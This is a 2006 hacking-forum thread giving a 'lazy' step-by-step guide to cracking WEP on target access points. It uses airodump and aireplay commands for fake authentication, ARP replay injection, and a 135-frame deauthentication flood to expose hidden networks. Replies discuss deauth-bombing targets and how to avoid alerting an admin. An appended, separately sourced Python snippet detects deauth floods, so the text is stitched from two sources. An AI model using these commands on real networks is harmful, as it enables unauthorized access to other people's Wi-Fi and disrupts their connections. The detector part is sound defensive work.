Remote Exploit Forums

#1
Old 03-09-2006, 11:55 PM
Just burned his ISO
 
Join Date: Mar 2006
Posts: 3
An even quicker way of cracking WEP with B|T

This is a guide for all those REALLY lazy people out there, who come into #remote-exploit complaining that they don't understand the guides on here.
Granted, you people should be directed to www.google.com, or shot... whichever works best.

However! If this will save me some time explaining later... I'm all for it.

FIRST NOTE:
My laptop, which I use BackTrack on, is poop, so I try not to run X whenever possible. For this guide, let's just assume that you're running it CLI style.
For this tutorial I am using a Proxim Orinoco Gold card (8470-WD).
This device runs on ath0.


SECOND NOTE:
someone buy me a nice laptop!


###############################
login to system
airodump ath0 outfile 0 1

ALT F2

login to system
aireplay ath0 -1 0 -e TARGETESSID -a TARGETBSSID -h CLIENTMAC/0:1:2:3:4:5
aireplay ath0 -3 -e TARGETESSID -b TARGETBSSID -h CLIENTMAC/0:1:2:3:4:5 -x 985

If you're close enough to the AP, the AP isn't heavily protected against packet injection, AND you've got a rough idea what you're doing, you should see the IVs flying up in ALT F1 (airodump).
If not, unlucky, it won't work this time. May I suggest you read up on what you're doing and find a better way of doing it.

SIDE NOTE: If the AP you're targeting does not broadcast its ESSID, run:
aireplay ath0 -0 135 -a BSSID -h CLIENTMAC/0:1:2:3:4:5

This should deauth clients, forcing them to reconnect, and there's a chance you'll pick up the ESSID during this process.

Good luck!
#2
Old 03-09-2006, 11:56 PM
Senior Member
 
Join Date: Feb 2006
Posts: 161

Gives flame a Gold Star. Thanks for keeping it easy for the lazy people.
#3
Old 03-10-2006, 12:10 AM
Senior Member
 
Join Date: Feb 2006
Posts: 100

As far as I know, Kismet will find the SSID of APs. Mine doesn't broadcast, but given about 30 seconds, Kismet identifies my ID.
#4
Old 03-16-2006, 08:42 PM
Just burned his ISO
 
Join Date: Mar 2006
Posts: 3

K, well, Kismet can do it sometimes, but I've found the best way of getting a hidden ESSID is to deauth bomb the target :S But use whatever works best for you.
#5
Old 03-16-2006, 08:44 PM
Senior Member
 
Join Date: Feb 2006
Posts: 161

If you issue too many DeAuths in secure airspace you may alert an Admin to your presence. Beware!
#6
Old 03-16-2006, 09:45 PM
Senior Member
 
Join Date: Feb 2006
Posts: 100

Doesn't surprise me, but could you tell me what signs I'd expect to see? I've deauthed my computer many times. I'd run the command, and if, when it completes, I don't get ARP packets, I'd issue it again. Sometimes I'd do it 5 or more times with 10 deauths. Never did I lose connectivity on MSN or have Windows warn me I lost connection.

I'm assuming it's all in router logs?
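The signs post #6 asks about are what a wireless IDS looks for: a burst of deauthentication frames far above the one or two a station produces when it roams or disconnects, typically all carrying the AP's own address as transmitter. As an added example that is not from this thread, the Python below runs a sliding-window deauth-flood detector over a constructed frame log; the log format, MAC addresses, reason codes and the 20-frames-in-10-seconds threshold are all made up for the example.

```python
import re
from collections import defaultdict, deque

# Constructed sample capture, one 802.11 management frame per line:
#   "<epoch seconds> <subtype> src=<transmitter> dst=<receiver> reason=<code>"
# Two routine deauths (a station leaving and the AP answering) followed by a
# 135-frame burst in under 3 seconds, all apparently sent from the AP's address.
AP, STA = "00:11:22:aa:bb:cc", "00:01:02:03:04:05"
SAMPLE_FRAMES = "\n".join(
    [f"1000.00 beacon src={AP} dst=ff:ff:ff:ff:ff:ff reason=0",
     f"1000.50 deauth src={STA} dst={AP} reason=3",
     f"1001.00 deauth src={AP} dst={STA} reason=3"]
    + [f"{1200 + i * 0.02:.2f} deauth src={AP} dst={STA} reason=7" for i in range(135)]
)

LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) (?P<subtype>\w+) src=(?P<src>[0-9a-f:]{17}) "
    r"dst=(?P<dst>[0-9a-f:]{17}) reason=(?P<reason>\d+)$"
)

def parse_frames(text):
    """Parse the constructed log format into (ts, subtype, src, dst, reason) tuples."""
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            frames.append((float(m["ts"]), m["subtype"], m["src"], m["dst"], int(m["reason"])))
    return frames

def detect_deauth_floods(frames, window_s=10.0, threshold=20):
    """Flag any transmitter whose deauth count inside a sliding window of window_s
    seconds reaches threshold; frames must be time-ordered. Returns {src: details}."""
    recent = defaultdict(deque)  # transmitter -> deque of (ts, dst, reason) in window
    alerts = {}
    for ts, subtype, src, dst, reason in frames:
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append((ts, dst, reason))
        while ts - q[0][0] > window_s:  # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(src, {"first_seen": q[0][0], "peak": 0,
                                        "targets": set(), "reasons": set()})
            a["peak"] = max(a["peak"], len(q))  # largest burst seen in one window
            a["targets"].update(d for _, d, _ in q)
            a["reasons"].update(r for _, _, r in q)
    return alerts
```

In practice the frames would come from a monitor-mode capture and the threshold would be tuned to how often stations legitimately roam on that network.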